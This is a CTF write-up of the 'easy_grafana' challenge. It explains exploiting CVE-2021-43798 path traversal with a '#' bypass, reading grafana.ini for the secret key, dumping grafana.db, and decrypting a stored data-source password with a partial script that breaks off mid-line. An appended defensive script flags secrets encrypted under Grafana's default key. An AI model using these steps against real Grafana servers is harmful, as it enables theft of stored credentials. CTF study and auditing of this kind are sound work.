ByteCTF 2022 WriteUp
I feel I should set aside some time to properly study SQL injection again…

Web

easy_grafana

Opening the challenge shows Grafana v8.2.6, the classic CVE-2021-43798. The original PoC does not work, though, and returns 400. After looking into it, I found that a middleware layer is probably normalizing the URL, which stops the attack; adding # to the PoC gets around this.

Reading the configuration file /etc/grafana/grafana.ini reveals the SecretKey:

secret_key = SW2YcwTIb9zpO1hoPsMm

Next, dump the database /var/lib/grafana/grafana.db. The encrypted login password is in the secure_json_data column of the data_source table:

{"password":"b0NXeVJoSXKPoSYIWt8i/GfPreRT03fO6gbMhzkPefodqe1nvGpdSROTvfHK1I3kzZy9SQnuVy9c3lVkvbyJcqRwNT6/"}

Any decryption script found on GitHub will do:

```python
import base64
from hashlib import pbkdf2_hmac
from Crypto.Cipher import AES

saltLength = 8
aesCfb = "aes-cfb"
aesGcm = "aes-gcm"
encryptionAlgorithmDelimiter = '*'
nonceByteSize = 12


def decrypt(payload, secret):
    # Work out which algorithm was used and strip its marker from the payload.
    alg, payload, err = deriveEncryptionAlgorithm(payload)
    if err is not None:
        return None, err
    if len(payload) < saltLength:
        return None, "Unable to compute salt"
    # The first saltLength bytes are the salt for key derivation.
    salt = payload[:saltLength]
    key, err = encryptionKeyToBytes(secret, salt)
    if err is not None:
        return None, err
    if alg == aesCfb:
        return decryptCFB(payload, key)
    elif alg == aesGcm:
        return decryptGCM(payload, key)
    return None, None


def encryptionKeyToBytes(secret, salt):
    return pbkdf2_hmac("sha256", secret....
```
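An added defensive check, not part of the original write-up: the secret_key read from grafana.ini above is the default value Grafana ships with, so any instance that never changed it stores data source secrets under a publicly known key. The sketch below reports which data_source fields are in that state. The function names, the sample INI text and the in-memory database are constructed for illustration; GF_SECURITY_SECRET_KEY is Grafana's environment override for this setting.

```python
import base64
import binascii
import configparser
import json
import sqlite3

# Default [security] secret_key shipped with Grafana; the write-up found this same value.
DEFAULT_SECRET_KEY = "SW2YcwTIb9zpO1hoPsMm"
SALT_LENGTH = 8  # saltLength in the decryption script quoted on this page


def effective_secret_key(ini_text, env=None):
    """Key Grafana would use: environment override, then grafana.ini, then the default."""
    override = (env or {}).get("GF_SECURITY_SECRET_KEY")
    if override:
        return override
    cfg = configparser.ConfigParser(interpolation=None, strict=False)
    cfg.read_string("[DEFAULT]\n" + ini_text)  # tolerate keys above the first section
    return cfg.get("security", "secret_key", fallback=DEFAULT_SECRET_KEY).strip()


def secrets_under_default_key(ini_text, db, env=None):
    """Return (data source name, field) pairs still encrypted with the default key."""
    if effective_secret_key(ini_text, env) != DEFAULT_SECRET_KEY:
        return []
    findings = []
    for name, blob in db.execute("SELECT name, secure_json_data FROM data_source"):
        for field, value in json.loads(blob or "{}").items():
            try:
                raw = base64.b64decode(value, validate=True)
            except (binascii.Error, ValueError):
                continue  # not a Grafana-encrypted value
            if len(raw) > SALT_LENGTH:  # salt plus at least some ciphertext
                findings.append((name, field))
    return sorted(findings)


def build_sample_db():
    """Constructed stand-in for grafana.db: only the two columns this audit reads."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE data_source (name TEXT, secure_json_data TEXT)")
    placeholder = base64.b64encode(b"S" * SALT_LENGTH + b"constructed-ciphertext").decode()
    db.execute("INSERT INTO data_source VALUES (?, ?)",
               ("mysql-prod", json.dumps({"password": placeholder})))
    db.execute("INSERT INTO data_source VALUES (?, ?)", ("testdata", "{}"))
    return db


if __name__ == "__main__":
    sample_ini = "[security]\n;secret_key = SW2YcwTIb9zpO1hoPsMm\n"  # constructed
    for name, field in secrets_under_default_key(sample_ini, build_sample_db()):
        print(f"{name}: '{field}' is encrypted with the default secret_key; rotate both")
```

A commented-out secret_key line counts as the default, which is why the sample INI still produces a finding.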